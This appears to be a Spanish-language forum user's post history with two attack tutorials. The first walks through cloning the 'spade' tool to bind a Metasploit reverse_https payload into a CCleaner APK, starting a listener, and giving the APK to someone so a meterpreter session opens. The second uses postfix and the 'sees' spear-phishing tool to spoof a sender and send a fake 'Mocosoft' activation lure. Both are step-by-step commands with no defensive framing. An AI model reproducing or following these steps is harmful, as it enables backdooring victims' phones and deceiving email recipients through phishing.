Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - afravaz

Páginas1
#1
Seguridad / SPADE: Embeber backdoor en APK
25 Septiembre 2016, 16:13 PM
Definición:

Spade es un pequeño pero útil script que permite infectar fácilmente APKs con payloads de Android de Metasploit.

Requisitos:

    Metasploit
    Python
    Un APK

Tutorial:

Primero descargaremos una apk la cual queramos bindear con nuestro payload. En este caso se ha escogido CCLEANER. Podremos descargar la apk desde la siguiente URL: https://www.apk4fun.com/apk/10919/

Segundo descargaremos spade y bindearemos nuestra apk:

Código [Seleccionar]
git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py [Ruta APK]

Nos preguntará que payload queremos usar. En este tutorial se ha escogido el 2 (reverse_https).

También nos preguntará la IP LOCAL y el puerto.

Y por último nos preguntará si queremos iniciar un listener con metasploit, le daremos a que si para ahorrarnos tiempo.

Pasaremos la apk a alguien y cuando la inicie nos abrirá una sesión con meterpreter.

Vídeo:

https://www.youtube.com/watch?v=x6A8r-i7SMw
#2
Seguridad / Email Spoofing
4 Septiembre 2016, 15:19 PM
Definición:

Email spoofing es la creación de mensajes de correo electrónico con una dirección de remitente falso. Es fácil de hacer porque los protocolos básicos no tienen ningún mecanismo de autenticación. Se puede llevar a cabo desde dentro de una LAN o desde un entorno externo utilizando troyanos. Emails de spam y phishing suelen utilizar este engaño para inducir a error al destinatario sobre el origen del mensaje.

Requisitos:

Postfix –> apt-get install postfix
Mailutils –> apt-get install mailutils

Tutorial:

Iniciamos postfix:
Citar/etc/init.d/postfix start
Clonamos el repositorio sees (A Social Engineering Attack/Audit Tool for Spear Phishing):

Citargit clone https://github.com/galkan/sees.git

Elegir correo a suplantar y a quien se lo envias:

Citarnano sees/config/mail.user

Editar archivo de configuración de sees:

Citarnano sees/config/sees.cfg
(Poner el domino que hemos configurado al instalar postfix)

Editamos lo que vamos a enviar:

Citarnano sees/data/[Podemos enviar texto planto, html, docx, pdf..]

En mi caso enviaré el html.text pero haciéndole unas modificaciones para que quede así:
Código [Seleccionar]
<html>
<body>
<h1><center>Mocosoft te da la bienvenida</center></h1>
<b>Confirmación de registro</b>
<br>
<br>
<p>Haz click en el enlace para activar su cuenta</p>
<a href="192.168.1.130/confirmacion.jpg">ACTIVAR CUENTA</a>
</body>
</html>
El hipervínculo apunta a una foto que tengo en un servidor.

Para enviar el mensaje:

Citar./sees.py – -text – -config_file config/sees.cfg – -mail_user config/mail.user – -html_file data/html.text -v

Ayuda:
–text = No vamos a enviar ningún archivo adjunto
–config_file = Archivo de configuración de sees.
–mail_user = Archivo donde se elige el correo a suplantar
–html_file = Archivo html
-v = Para enviar

Vídeo:
[youtube=640,360]https://www.youtube.com/watch?v=I7mkTxb8yp8[/youtube]
Páginas1